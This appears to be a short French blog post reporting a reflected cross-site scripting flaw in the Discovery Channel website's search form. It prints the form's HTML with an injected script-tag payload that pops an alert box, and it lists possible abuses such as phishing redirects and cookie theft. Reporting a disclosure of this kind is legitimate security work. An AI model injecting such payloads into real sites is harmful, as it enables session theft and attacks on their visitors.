Alerte à la faille XSS sur le site de la chaîne américaine Discovery Channel

1
76

Discovery Channel est une chaîne de télévision américaine câblée qui diffuse principalement des programmes axés sur les sciences, beaucoup de reportages consacrés à la nature et à des thèmes très variés.

Celui qui a découvert la faille de sécurité est un internaute Français. Il a fournis un PoC ainsi que deux captures d’écran montrant deux possibilités d’exploitation de la vulnérabilité sur le site de la chaîne TV américaine.

La faille de type Cross Site Scripting (non permanente) est présente dans le formulaire de recherche :

<legend>Site Search</legend><input type="hidden" value="DCUK" name="proxystylesheet">
<input type="hidden" value="ukDiscovery" name="site"><input type="hidden" value="DCUK" name="client"><input type="hidden" value="uk" name="region"><input type="hidden" value="xml_no_dtd" name="output"><input type="hidden" value="*" name="getfields"><input type="hidden" value="1" name="filter">
<input type="hidden" value="utf8" name="ie">
<input type="hidden" value="utf8" name="oe">
<label for="searchbox" class="search-label">Search</label>
<input id="dni-hat-search-field" class="search-field" type="text" value=""/></script><script>alert("XSS")</script>" name="q">
<input class="search-button" id="dni-hat-search-button" type="submit" value="go"

Voici les deux captures d’écrans fournies, la première montrant une boite de dialogue générée via la XSS et la seconde, une iFrame externe :

Bien entendu, les possibilités sont multiples, nous pouvons citer notemment :

  • Redirection vers un site pirate (phishing ou autre)
  • Vol de cookie / session
  • Prise de contrôle du navigateur de l’internaute
  • etc…

Les commentaires sont fermés.